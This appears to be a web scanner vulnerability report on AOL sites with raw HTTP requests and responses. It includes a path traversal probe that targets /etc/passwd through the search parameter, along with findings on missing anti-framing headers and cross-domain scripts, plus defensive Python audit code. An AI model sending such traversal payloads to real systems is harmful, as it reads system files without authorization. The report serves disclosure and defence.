User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;)

Pragma: no-cache
Cache-Control: no-cache
Content-Length: 0
Referer: http://search.aol.com/aol/settings?oreq=8c258a7646f6467b89d55243f86e5a19&v_t=na
Host: search.aol.com


Response:



HTTP/1.1 200 OK

Date: Wed, 13 May 2015 16:52:51 GMT
Set-Cookie: mcAuth=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=aol.com
Set-Cookie: mcAuth=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/
Set-Cookie: mcAuth=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=search.aol.com
Set-Cookie: RSP_CHECK_PORTAL_SEARCH.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=aol.com
Set-Cookie: RSP_CHECK_PORTAL_SEARCH.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/
Set-Cookie: RSP_CHECK_PORTAL_SEARCH.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=search.aol.com
Set-Cookie: clickstreamid=1387484737994812305
Set-Cookie: s_guid="ddaaef58005b44d5b5a3560642b6b722:130515"; Version=1; Domain=.search.aol.com; Max-Age=33955200; Expires=Thu, 09-Jun-2016 16:52:51 GMT; Path=/
Set-Cookie: MVT_TBP=f1|118|20150513|20150513; Domain=.search.aol.com; Expires=Thu, 09-Jun-2016 16:52:51 GMT; Path=/
Set-Cookie: MVT_TBV=f1|38; Domain=.search.aol.com; Path=/
Set-Cookie: MVT_TBP="f1|118|20150513|20150513|csa_web_slinkon_CNTL1:1"; Version=1; Domain=.search.aol.com; Max-Age=33955200; Expires=Thu, 09-Jun-2016 16:52:51 GMT; Path=/
Set-Cookie: ie6Promotion_view_count=1; Expires=Mon, 31-May-2083 20:06:58 GMT
Set-Cookie: ie6Promotion_start_time=1431535971448; Expires=Mon, 31-May-2083 20:06:58 GMT
Expires: Sat, 1 Jan 2000 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html;charset=UTF-8
Content-Language: en-US





10

Risk: High
Confidence: Medium
Parameter: q
Attack: root:x:0:0
CWE id: 22
WASC id: 33



http://search.aol.com/aol/search?q=c%3A%5Cetc%2Fpasswd&s_it=searchbox.webhome&v_t=na&oreq=8c258a7646f6467b89d55243f86e5a19&page=2 HTTP/1.1



User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0;)

Pragma: no-cache
Cache-Control: no-cache
Content-Length: 0
Referer: http://search.aol.com/aol/search?q=ZAP&s_it=searchbox.webhome&v_t=na
Host: search.aol.com




Response:



HTTP/1.1 200 OK

Date: Wed, 13 May 2015 16:07:05 GMT
Set-Cookie: mcAuth=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=aol.com
Set-Cookie: mcAuth=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/
Set-Cookie: mcAuth=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=search.aol.com
Set-Cookie: RSP_CHECK_PORTAL_SEARCH.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=aol.com
Set-Cookie: RSP_CHECK_PORTAL_SEARCH.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/
Set-Cookie: RSP_CHECK_PORTAL_SEARCH.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=search.aol.com
Set-Cookie: clickstreamid=-8531884303794427980
Set-Cookie: s_guid="6681a6e5652646639ecdb70564f84a78:130515"; Version=1; Domain=.search.aol.com; Max-Age=33955200; Expires=Thu, 09-Jun-2016 16:07:05 GMT; Path=/
Set-Cookie: MVT_TBP=f1|562|20150513|20150513; Domain=.search.aol.com; Expires=Thu, 09-Jun-2016 16:07:05 GMT; Path=/
Set-Cookie: MVT_TBV=f1|222; Domain=.search.aol.com; Path=/
Set-Cookie: MVT_TBP="f1|562|20150513|20150513|SLclicktxtOff_CNTL1:1"; Version=1; Domain=.search.aol.com; Max-Age=33955200; Expires=Thu, 09-Jun-2016 16:07:05 GMT; Path=/
Expires: Sat, 1 Jan 2000 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html;charset=UTF-8
Content-Language: en-US





CSRF X-FRAME-OPTIONS HEADER NOT SET (5065)
******************************************

Risk: Medium
Confidence: Medium

Solution:

Most modern web browsers support the X-Frame-Options HTTP header. Ensure it is set on all web pages returned by your site. If you expect the page to be framed only by pages on your server (e.g. it is part of a FRAMESET) then you will want to use SAMEORIGIN; otherwise, if you never expect the page to be framed, you should use DENY. ALLOW-FROM allows specific websites to frame the web page in supported web browsers.

Only two examples (too many: 5065 instances)
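The two proofs of concept that follow show responses with no X-Frame-Options header at all. The check below is an added Python example, not code from this advisory or from the vendor. It classifies a response's anti-framing posture from its headers (X-Frame-Options as the solution text recommends, plus the Content-Security-Policy frame-ancestors directive, which browsers that support it apply in preference to X-Frame-Options) and returns the headers a server should add for a page that must not be framed. ASVCS_RESPONSE_HEADERS is a subset transcribed from the asvcs.aol.com response in the first proof of concept; the other header sets are constructed.

```python
"""Anti-framing header check. Added example for this advisory, not AOL code.
ASVCS_RESPONSE_HEADERS is a subset transcribed from the asvcs.aol.com
response in the proof of concept; the other header sets are constructed."""

ASVCS_RESPONSE_HEADERS = [
    ("Date", "Wed, 13 May 2015 13:08:27 GMT"),
    ("Server", "Apache"),
    ("Cache-Control", "no-cache, must-revalidate, post-check=0, pre-check=0"),
    ("X-AOL-SNH", "8e0be3cec0fd3de369b26c645c803484"),
    ("X-UA-Compatible", "IE=edge"),
    ("Vary", "Accept-Encoding"),
    ("Content-Length", "378"),
    ("Content-Type", "text/html"),
]


def framing_policy(headers):
    """Classify how a response restricts framing.

    headers: iterable of (name, value) pairs; names are case-insensitive.
    Returns "csp" when a Content-Security-Policy frame-ancestors directive is
    present, "xfo" when a single valid X-Frame-Options value (DENY, SAMEORIGIN
    or ALLOW-FROM <uri>) is present, and "none" otherwise. Unsupported values
    such as ALLOWALL, and conflicting duplicate X-Frame-Options headers, are
    treated as unprotected for audit purposes.
    """
    xfo_values = []
    csp_frame_ancestors = False
    for name, value in headers:
        lowered_name = name.strip().lower()
        if lowered_name == "x-frame-options":
            xfo_values.append(value.strip().upper())
        elif lowered_name == "content-security-policy":
            directives = (d.strip().lower() for d in value.split(";"))
            if any(d.startswith("frame-ancestors") for d in directives):
                csp_frame_ancestors = True
    if csp_frame_ancestors:
        return "csp"
    if len(set(xfo_values)) == 1:
        xfo = xfo_values[0]
        if xfo in ("DENY", "SAMEORIGIN") or xfo.startswith("ALLOW-FROM "):
            return "xfo"
    return "none"


def recommended_framing_headers(allow_self=False):
    """Headers to add, following the solution text: SAMEORIGIN when the site
    frames the page itself, DENY otherwise. Both headers are emitted so that
    older browsers (X-Frame-Options) and current ones (CSP) enforce the same
    policy."""
    if allow_self:
        return [("X-Frame-Options", "SAMEORIGIN"),
                ("Content-Security-Policy", "frame-ancestors 'self'")]
    return [("X-Frame-Options", "DENY"),
            ("Content-Security-Policy", "frame-ancestors 'none'")]


def audit(headers, allow_self=False):
    """Return (policy, headers_to_add) for one response."""
    policy = framing_policy(headers)
    missing = [] if policy != "none" else recommended_framing_headers(allow_self)
    return policy, missing


if __name__ == "__main__":
    policy, missing = audit(ASVCS_RESPONSE_HEADERS)
    print("asvcs.aol.com/sn_sync.html:", policy)
    for name, value in missing:
        print(f"  add: {name}: {value}")
```

Run against a crawl of responses, the "none" count is the figure a scanner reports (5065 here); the useful triage is which of those pages carry an authenticated action that a framed click could trigger.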





PROOF OF CONCEPT
***********************

1

 http://asvcs.aol.com/sn_sync.html HTTP/1.1




Proxy-Connection: keep-alive

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36
DNT: 1
Referer: http://cdn.at.atwola.com/_media/uac/tcode3.html
Accept-Encoding: sdch
Accept-Language: es-ES,es;q=0.8
Cookie: s_pers=%20s_fid%3D49A28934042265F6-144A9301083E75C3%7C1494680903186%3B%20s_getnr%3D1431522503194-Repeat%7C1494594503194%3B%20s_nrgvo%3DRepeat%7C1494594503196%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.4e6e39f797044c5ead9c2c8d301d3ad6.d7ac; CUNAUTHID=1.4e6e39f797044c5ead9c2c8d301d3ad6.d7ac; s_vi=[CS]v1|2AA996DE051D5D16-6000190660004439[CE]

Host: asvcs.aol.com



Response:


HTTP/1.1 200 OK

Date: Wed, 13 May 2015 13:08:27 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-82_158_237_5=esp%3A%3Amadrid%3A%3A40.42618%3A%3A-3.68514%3A%3Acable%3A%3Am; expires=Wed, 13-May-2015 14:08:27 GMT; path=/
X-AOL-SNH: 8e0be3cec0fd3de369b26c645c803484
X-UA-Compatible: IE=edge
Vary: Accept-Encoding
Content-Length: 378
Content-Type: text/html




Source Code:



<!DOCTYPE html>

<html>
<head>
    <!-- data-main attribute tells require.js to load
         scripts/main.js after require.js loads. -->
<script data-main="sn_sync" src="/include/sn_sync-built.js"></script>
</head>
<body leftmargin="0" topmargin="0" rightmargin="0" bottommargin="0">
    <img id="sn_sync" style="display: none" height="1" width="1" border="0"/>
</body>
</html>






2


http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=300x75;noperf=1;alias=93309868;cfp=1;noaddonpl=y;kvpops_cb=3_column_rm;kvpg=aol;kvugc=0;kvui=4e6e39f797044c5ead9c2c8d301d3ad6;kvh5lsid=0;kvmn=93309868;kvgrp=522503165;kvismob=2;kvoch=us.aolportal;extmirroring=0;kvtile=3;target=_blank;aduho=120;grp=522503165 HTTP/1.1


Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36
DNT: 1
Referer: http://www.aol.com/ads/load_v7.html
Accept-Encoding: sdch
Accept-Language: es-ES,es;q=0.8
Cookie: CfP=1
Host: at.atwola.com


Response



HTTP/1.0 200 OK

Expires: Mon, 15 Jun 1998 00:00:00 GMT
Pragma: no-cache
Cache-Control: no-store, no-cache
Server: Adtech Adserver
Content-Type: application/x-javascript
P3P: CP="NOI DSP DEVa OUR BUS UNI COM NAV INT"
Set-Cookie: JEB2=55534AD873651AC52F870E4EF0006986;expires=Fri, 12 May 2017 13:8:26 GMT;domain=atwola.com;path=/
Content-Length: 358
Connection: keep-alive


Source Code:



document.write('<a href="http://at.atwola.com/?adlink/5113/1649059/0/2018/AdId=5973711;BnId=241;itime=522506958;impref=14315225062181221732;imprefseq=96829599820353789;imprefts=1431522506;" target="_blank"><img src="http://aka-cdn-ns.adtechus.com/images/274/Ad0St1Sz2018Sq0V1Id24374546.jpg" border="0" alt="Advertisement" width="300" height="75"/></a>');









CROSS DOMAIN JAVASCRIPT SOURCE FILE INCLUSION (16773)
*****************************************************

Only one example (too many fails)

Risk: Low
Confidence: Medium
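The finding is that www.aol.com pages load script from domains other than their own, so whoever controls those domains (or can tamper with their responses in transit over plain http) can run code in the page. A defender's first step is an inventory of such includes. The Python below is an added example, not AOL code: it extracts script sources from HTML, separates same-origin from cross-domain ones, marks which hosts the reviewer has explicitly trusted (a first-party CDN, for instance), and records whether each tag carries a Subresource Integrity hash. The HTML it parses and the host names in it are constructed placeholders.

```python
"""Cross-domain script inventory. Added example for this advisory, not AOL
code; the HTML and the host names are constructed placeholders."""
from html.parser import HTMLParser
from urllib.parse import urlsplit


class ScriptSourceCollector(HTMLParser):
    """Collect (src, integrity) for every <script src=...> in a document."""

    def __init__(self):
        super().__init__()
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        attributes = dict(attrs)
        src = attributes.get("src")
        if src:
            self.scripts.append((src.strip(), attributes.get("integrity")))


def cross_domain_scripts(html, page_host, trusted_hosts=()):
    """Return one finding per script loaded from a host other than page_host.

    Each finding records the source URL, the host, whether that host is on
    the reviewer's trusted list, and whether the tag carries a Subresource
    Integrity hash. Relative sources belong to page_host and are skipped;
    protocol-relative "//host/x" sources are treated as cross-domain.
    """
    collector = ScriptSourceCollector()
    collector.feed(html)
    page_host = page_host.lower()
    trusted = {h.lower() for h in trusted_hosts}
    findings = []
    for src, integrity in collector.scripts:
        host = (urlsplit(src).hostname or page_host).lower()
        if host == page_host:
            continue
        findings.append({
            "src": src,
            "host": host,
            "trusted": host in trusted,
            "sri": integrity is not None,
        })
    return findings


# Constructed sample page: one same-origin script (path as in the sn_sync
# source shown in this advisory), one first-party CDN script, one third-party
# script. Host names are placeholders.
SAMPLE_HTML = """<!DOCTYPE html>
<html><head>
<script data-main="sn_sync" src="/include/sn_sync-built.js"></script>
<script src="http://cdn.example-cdn.net/p5/js/main.js"></script>
<script src="//tags.example-adnetwork.com/tag.js"></script>
</head><body></body></html>"""


def report(html=SAMPLE_HTML, page_host="www.example.com",
           trusted_hosts=("cdn.example-cdn.net",)):
    """Summarise as (untrusted scripts without SRI, all cross-domain scripts)."""
    findings = cross_domain_scripts(html, page_host, trusted_hosts)
    risky = [f for f in findings if not f["trusted"] and not f["sri"]]
    return len(risky), len(findings)


if __name__ == "__main__":
    for finding in cross_domain_scripts(SAMPLE_HTML, "www.example.com",
                                        ("cdn.example-cdn.net",)):
        print(finding)
    print("untrusted without SRI / cross-domain total:", report())
```

The "untrusted without SRI" count is the actionable number: a script from a host outside the organisation's control, served without an integrity attribute, is the case where a compromise of that third party (or of the unencrypted transport) becomes code execution in every visitor's browser.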


http://www.aol.com/ HTTP/1.1




Proxy-Connection: keep-alive

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36
DNT: 1
Accept-Encoding: sdch
Accept-Language: es-ES,es;q=0.8
Cookie: s_pers=%20s_fid%3D49A28934042265F6-144A9301083E75C3%7C1494679817612%3B%20s_getnr%3D1431521417622-Repeat%7C1494593417622%3B%20s_nrgvo%3DRepeat%7C1494593417624%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2AA996DE051D5D16-6000190660004439[CE]; UNAUTHID=1.4e6e39f797044c5ead9c2c8d301d3ad6.d7ac; CUNAUTHID=1.4e6e39f797044c5ead9c2c8d301d3ad6.d7ac
Host: www.aol.com




Response:



HTTP/1.1 200 OK

Date: Wed, 13 May 2015 13:08:22 GMT
Server: Apache-Coyote/1.1
Set-Cookie: RSP_CHECK_PORTAL_STARTPAGE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=www.aol.com
Set-Cookie: RSP_CHECK_PORTAL_STARTPAGE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/
Set-Cookie: RSP_CHECK_PORTAL_STARTPAGE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 1970 GMT; path=/; domain=aol.com
Pragma: no-cache
Cache-Control: max-age=0, no-cache, no-store
R-Host: vm-149-174-11-24.asset.aol.com
ModPagespeedDisableFilters: rewrite_javascript,inline_css
Set-Cookie: JSESSIONID=C1C6311C0CC89ED9C4B1A74FE1C6581A; Path=/aol
Set-Cookie: tst=%2C65%2Cs391a%3A%2C73%2Cs392a%3A%2C70%2Cs393a%3A%2C71%2Cs394a%3A%2C69%2Cs395a%3A%2C73%2Cs396a%3A%2C94%2Cs397a%3A%2C70%2Cs398a%3A%2C81%2Cs399a%3A%2C94%2Cs400a%3A%2C95%2Cs401a%3A%2C81%2Cs402a%3A%2C79%2Cs403a%3A%2C64%2Cs404a%3A%2C6%2Cr903a%3A%2C4%2Cr904a%3A%2C1%2Cresptest%3A%2C4%2Cn700a%3A%2C4%2Cn701a%3A%2C6%2Cn702a%3A%2C90%2Cn703a%3A%2C4%2Cn704a%3A%2C3%2Cn705a%3A%2C3%2Cn706a%3A%2C0%2Cgravity-test%3A%2C0%2Cdlug-test; Expires=Fri, 12-May-2017 13:08:22 GMT; Path=/
X-Mod-Pagespeed: 1.6.29.7-3343
Vary: Accept-Encoding
Content-Length: 210269
Content-Type: text/html;;charset=utf-8







Source Code:


(Some examples are in the source code below; see the parts marked with *****.)




<!DOCTYPE html>

<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" class="cobrand-main5  page- SAF MS adellesans-enabled  aol20 responsive  

notResponsiveTouch  " id="global-header-light">

<head>
<!-- vm-149-174-11-24.asset.aol.com 1431522502557 -->


****<style type="text/css">***********#chromeOneClick{cursor:pointer************ }</style><link rel="stylesheet" type="text/css" href="http://portal.aolcdn.com/p5/_v116.7/css/responsive.css"/><link rel="stylesheet" type="text/css" class="skin_link" *******



href="http://portal.aolcdn.com/p5/skin/_v81/A.city_blimp.css.pagespeed.cf.77HLeHtE1S.css"/>


<style>***********.IE #header_logo{filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='http://portal.aolcdn.com/p5/_v116.7/css/logo_IE.png', sizingMethod='crop')}***********************   </style><style type="text/css" id="adhoccss-responsive-



.slideshowmod.gmod{margin-top:-30px!important}.page-news .slideshowmod.gmod{margin-top:-30px!important}.mnid-news-social.gmod{border-bottom:none!important;padding-top:6px!important}.ccn{margin:0}#brightSpot{padding:0;margin:21px auto;border-




height:18px}.trend-v2 #aol-trendingstories span.apx-spmod-sponsored{position:absolute;top:14px;left:0}</style><script type="text/javascript" *********



**************src="http://portal.aolcdn.com/o.aolcdn.com/fonts/faw1kht.js.pagespeed.jm.xDwd8qSBeA.js"></script>*******************************




**********<script type="text/javascript">***********try{Typekit.load();}********catch(e){}</script>




<link rel="canonical" href="http://www.aol.com/"/>

<link href="https://plus.google.com/115771908788438436647/" rel="publisher"/>
<meta http-equiv="pics-label" content='(pics-1.1 "http://www.icra.org/ratingsv02.html" l r (ca 1 lz 1 nz 1 oz 1 vz 1) gen true for "http://www.aol.com" r (ca 1 lz 1 nz 1 oz 1 vz 1) "http://www.rsac.org/ratingsv01.html" l r (n 0 s 0 v 0 l 0) gen true for 

"http://www.aol.com" r (n 0 s 0 v 0 l 0))'/>

<meta name="description" content="AOL offers today's news, sports, stock quotes, weather, movie 



<script type="text/javascript">***********************var pops_cb="3_column_rm";</script>******************************



<script type="text/javascript">******************String.prototype.trim=function(){return this.replace(/^\s*/,"").replace(/\s*$/,"")};function gC(a){var e=document.cookie.split(";");for(var b=0;b<e.length;b++){var d=e[b].trim().split("=");if(d[0]==a){return d[1]}}return 

*******************************************************
null}var 
de="www.aol.de",fr="www.aol.fr";var ius=new Array(de,fr);var TZs=new Array();TZs={0:{},1:{de:de,"de-at":de,"de-li":de,"de-lu":de,"de-ch":de,fr:fr,"fr-be":fr,"fr-lu":fr,"fr-mc":fr,"fr-ch":fr},2:{de:de,"de-at":de,"de-li":de,"de-lu":de,"de-ch":de,fr:fr,"fr-be":fr,"fr-
**********************************************************************

l*********u":fr,"fr-mc":fr,"fr-ch":fr},3:{},4:{},5:{},6:{},7:{},8:{},9:{},10:{},11:{},12:{},13:{},"-12":{},"-11":{},"-10":{},"-9":{},"-8":{},"-7":{},"-6":{},"-5":{},"-4":{},"-3":{},"-2":{},"-1":{}}******;var offSet=String(-(new Date().getTimezoneOffset()/60));var langloc=String(nav_lang());var fqdn;if


(TZs[offSet]&&TZs[offSet][langloc]){fqdn=TZs[offSet][langloc]}var doIr=true;if(typeof iro!="undefined"){for(var i in iro){if(iro[i]==fqdn){doIr=false}}}if(gC("intlr")=="0"){doIr=false}if(!gC("intlRedirBp")&&doIr){var ckNm="l18nUrl";var myLclUrl=gC(ckNm);if(myLclUrl!

*******************************************************************************

**************=null){for(i=0;i<ius.length;i++){if(myLclUrl.indexOf(ius[i])>=0){window.location.href=myLclUrl+"?r="+document.domain;break}}}else{if(fqdn){fqdn="http://"+fqdn;document.cookie=ckNm+"="+fqdn+";";window.location.href=fqdn+"?r="+document.domain}}}function ***********************


*************nav_lang(){if(typeof(navigator.language)=="string"){return(navigator.language.toLowerCase())}else{if(typeof(navigator.userLanguage)=="string"){return(navigator.userLanguage.toLowerCase())}else{return 0}}};</script>*****************



<meta data-nothing=''></meta>

************************************************************
<script type="text/javascript">*************var tidEnabled="true";var tidUrl="https://tacoda.at.atwola.com/atx/sync/hmpg/hp1id/default";var tidCookieTimeout="259200";var tidCookieRefreshBeforeExpiredTime="1";var 

getTidNoRdrBsDmnLstApnd="www.aol.com";var tidRdrCkiBsNm=".aol.com";var segEnabled="false";var segGenerationUrl="/ids.jsp";var segCookieFormatVersion="3";var glbLocTZCookieVer="1";var glbLocTZCookieExpSecs="43200";</script>**************





<script type="text/javascript">***************var osMergedJSCallbacks=[];var lazyLoadJavascripts=[];var beaconSwipeCallDelay=parseInt("");var segUserId="0",segSegId="M|N_3",segColIds="usprod-5.dl";(function(g){var d=g.getElementsByTagName("head")[0]||


g.documentElement,c={},e={},f={},b={},h={};function a(j,r){var o=b[j]=this._c,q=g.createElement("script"),n=0,p,m=p="text/javascript",k="c",i=(function(s){s[s]=s+"";return s[s]!=s+""})(new String("__count__"));function l(s,t){function u(w){do{if(!c[w]){return 0}}while


(w=b[w]);return 1}

var v=f[s];if(t===m){v&&v();l(h[s],k)}else{s&&u(s)&&!e[s]&&a(s,v)}}
f[j]=r;if(o&&!i){h[o]=j;p=k}
q.type=p;q.src=j;p===m&&(e[j]=1);q.onload=q.onreadystatechange=function(){if(!n&&(!q.readyState||q.readyState==="loaded"||q.readyState==="complete")){c[j]=n=1;l(j,p);q.onload=q.onreadystatechange=null;d.removeChild(q)}};d.insertBefore
*******************************************************************
(q,d.firstChild);return{_c:j,getJS:a}}
window.Aol||(Aol={});Aol.getJS=a})(document);bN_cfg={h:"aol.com, www.aol.com,www.aol.ca,aol.ca,w.main.welcomescreen.aol.com,main-w.welcomescreen.aol.com,n.main.welcomescreen.aol.com,main-


hl,633832|mnc-news-feed-dailyfinance,559408|user-menu,622767|mnc-sports-news-si",1],["uxi",segUserId],['sxi',segSegId],["cids",segColIds,1]],upgradeIE:false};beaconIcidPattern=new RegExp('(.*)?video\/|/videoid=');parStripList=


*******************************************


['aLk','impref,itime'];rebuildUrlFuncs=new Array();rebuildUrlFuncs.aLk=function(c){if(parStripList==null||parStripList.length<=0){return c}var f=c;var a=new Array();for(i=0;i<parStripList.length;i+2){var b=parStripList[i];var e=parStripList[i+1];if(b=="aLk"&&e!

*******************************************************************************

==null&&e.length>0){a=parStripList[i+1].split(",");break}}for(i=0;i<a.length;i++){var g=a[i];var d=g+"=.*?;|"+g+"=.*?$";var h=f.match(d);if(h!=null&&h.length>0){f=f.replace(h,"")}}return f};osMergedJSCallbacks.push(function(){if(document.createEvent){var 


******************************************************************************

a=document.createEvent("HTMLEvents");a.initEvent("BeaconLoaded",true,true);document.dispatchEvent(a)}bN.extractIds=function(f,d){var g=f.className,e=g&&g.match(/[a-z]{1,3}id-[^ ]+/g),m,c,h,j,k=encodeURIComponent,n,p=g&&g.match(/d_clk

*********************************************************************************


+/g);rebuildMethodNm=g&&g.match(/rufnc-[^ ]+/g);var b=null;if(g){b=g.match(/src-[^ ]+/)}if(b!=null){if(e!=null){e.push(b[0])}else{e=b}}if(typeof d!="undefined"){n=d}else{bN.set([["plid","",1],["mnid","",1],["mpid","",1],["mlid","",1],["lnid","",1],["icid","",1],


*********************************************************************************


["ncid","",1],["dtid","",1],["anid","",1],["apnIcidGlb","",1],["vid_series","",1],["vid_autoplay","",1],["vid_id","",1],["cid","",1],["src","",1],["d_clk","",1]]);n=""}if(p!=null&&p.length>0){bN.set("d_clk",1,1)}if(e){l=e.length;while(l--){m=e[l];h=m.indexOf("-");m=[m.substring


************************************************************************


(0,h),m.substr(h+1)];if(n.indexOf("|"+m[0]+"|")==-1){n+="|"+m[0]+"|";bN.set(m[0],m[1],1);if(m[0].match(/[in]cid/g)!=null){var o=m[1];if(typeof(p_c_n)!="undefined"&&o.indexOf(p_c_n)===-1){o=o+"_"+p_c_n}m=k(m[0])+"="+k(o);if((c=f.href)&&c.indexOf(m)===-


****************************************************************************


1&&c.substring(0,6)!="aol://"){f.href=c+((c.indexOf("?")===-1)?"?":"&")+m}}}}}(j=f.parentNode)&&bN.extractIds(j,n)};bN.rebuildHrefWithIcid=function(d,b){var c="";var e="";if(d.indexOf("?")==-1){return d+"?"+b}if(d.indexOf("icid=")>=0){urlParts=d.split("?");params=new 


Array();if(d.indexOf("&")==-1){params[0]=urlParts[1]}for(i=0;i<params.length;i++){param=params[i];if(param.indexOf("icid=")>=0){e=e+b+"&";continue}e=e+param+"&"}return urlParts[0]+"?"+e.substr(0,e.length-1)}else{return d+"&"+b}};bN.swipe=function(b,d,c)


*********************************************************************************


(h||b){evNdHref=g.href;if(typeof(beaconIcidPattern)=="undefined"){return}if(!evNdHref.match(beaconIcidPattern)){return}tmp=bN.get("template");cob=bN.get("cobrand");mid=bN.get("mnid",1);lid=bN.get("lnid",1);pid=bN.get


("plid",1);newIcidParam="icid="+encodeURIComponent(tmp+"|"+cob+"|"+mid+"|"+lid+"|"+pid);newHref=bN.rebuildHrefWithIcid(g.href,newIcidParam);g.href=newHref}})});</script>


**********************<script type="text/javascript">function PortalRightAdWrapper(){$("#adchoice").removeClass("right");$("#adfeedback").removeClass("righto");}</script>******************************


<script>*****************var lbCbr="videodeeplink";</script>***************************



<iframe src="./ads/load_v7.html#1" width="0" height="0" scrolling="NO" marginwidth="0" marginheight="0" frameborder="0" style="display:none"></iframe>



<script type="text/javascript">**************var assetsUrl='http://portal.aolcdn.com/p5/_v116.7';</script>**********************

<!-- os_merge -->



<script type="text/javascript" src="http://o.aolcdn.com/os_merge/?file=/ads/adsWrapper.js"></script>

<script type="text/javascript"></script>

</head>

<body class="city_blimp  "><noscript><meta HTTP-EQUIV="refresh" content="0;url='http://www.aol.com/?ModPagespeed=noscript'" /><style><!--table,div,span,font,p{display:none} --></style><div style="display:block">Please click <a href="http://www.aol.com/?

ModPagespeed=noscript">here</a> if you are not redirected within a few seconds.</div></noscript>

<div id="state-indicator" class="state-indicator"></div>
<script type="text/javascript">

**************************if(!Array.prototype.indexOf){Array.prototype.indexOf=function(a,b){var c=this.length>>>0;b=+b||0;if(Math.abs(b)===Infinity){b=0}

if(b<0){b+=c;if(b<0){b=0}}
for(;b<c;b++){if(this[b]===a){return b}}
return-1}};function getDeviceState(){var a=document.getElementById("state-indicator");var b;if(a.currentStyle){b=a.currentStyle.zIndex;}else{b=parseInt(window.getComputedStyle(a).getPropertyValue("z-index"),10)}
return b};function getMn(g,f,a,i,b,d,des){var e=getDeviceState();var c={};c.mns=g;c.mn=f;c.sps=a;c.div=i;c.w=b;c.h=d;c.des=des;if(a.indexOf(e)===-1){f=null}
if(g!==null&&g[e]!==null&&typeof(g[e])!=="undefined"&&g[e]!==""){f=g[e]}
c.cur=f;hmpg_ads.push(c);return f};var hmpg_ads=new Array();if(typeof AOL==="undefined"){AOL={};}
AOL.responsiveEnabled=true;AOL.isTablet=false;AOL.isWurflMobile=false;AOL.isMobileSwipe=false;AOL.pageType="";AOL.cobrand="main5";AOL.hostname="vm-149-174-11-

*****************24.asset.aol.com";AOL.timestamp="1431522502557";AOL.collapseModuleFeatureEnabled="false";AOL.enableMobileSearchFocus=false;AOL.articleOverlayActive=false;</script>

<script type='text/javascript'>adSetMOAT('1');</script>
<script type='text/javascript'>adSetOthAT('kvpops_cb=3_column_rm');</script>
<script type="text/javascript">adSetAdURL('./ads/load_v7.html');</script><script type="text/javascript">function MakeThisMyHomepage(){var 


p_c_n="main5";</script><script type="text/javascript" *********************



src="http://portal.aolcdn.com/o.aolcdn.com/os/aol/omniture.min.js.pagespeed.ce.PQC9PI6SM1.js"></script><script type="text/javascript">if(typeof s_265!="undefined"&&s_265!=null)


{s_265.channel="us.aolportal";s_265.linkInternalFilters="javascript:,aol.com,mapquest.com,#dl";s_265.linkTrackVars="prop20";s_265.pageName="homepage main";s_265.pageName='homepage 



<div class="mpid-1 ">

<div class="visNum dn">14</div>
<div id="themew" class='promo'></div></div>
</div>
<div id="pgbg" class="aol-global-header-true light aolv2-true">
<div id="global-header-bg" class="light"></div>
<div id="aol-header" class="aol-global-header light">
<div class="mpid-2 ">
<div id="headerlogo-global" class="mnid-logo plid-538140 globalHeaderLogo">
<div id="mobilegridlogosrc" class="dn" data-logodark="http://portal.aolcdn.com/p5/forms/26319/2b9734c1-362f-44c0-ae7a-bf6315ed2f6c.png" data-logomain="http://portal.aolcdn.com/p5/forms/56191/d3a8d933-16c2-4827-8663-


*******************************************************************

src="data:image/png;base64,[inline base64 image data removed]"/></a></div></div>

<div class="mpid-3 ">
<div id="search-shadow"></div>
<div class="mnid-header-search plid-531175">
<form id="aol-header-search" action="http://search.aol.com/aol/search" method="get" class="search search-3 tabs-0">

<input type="hidden" id="header-ghostText" value=""/>

<input type="hidden" id="header-searchIcon" value=""/>
<input type="hidden" id="header-enabledTerms" name="enabled_terms" value=""/>
<input type="hidden" id="header-s_it" name="s_it" value="comsearch"/>
<input type="hidden" id="header-s_it_h" value="comsearch"/>
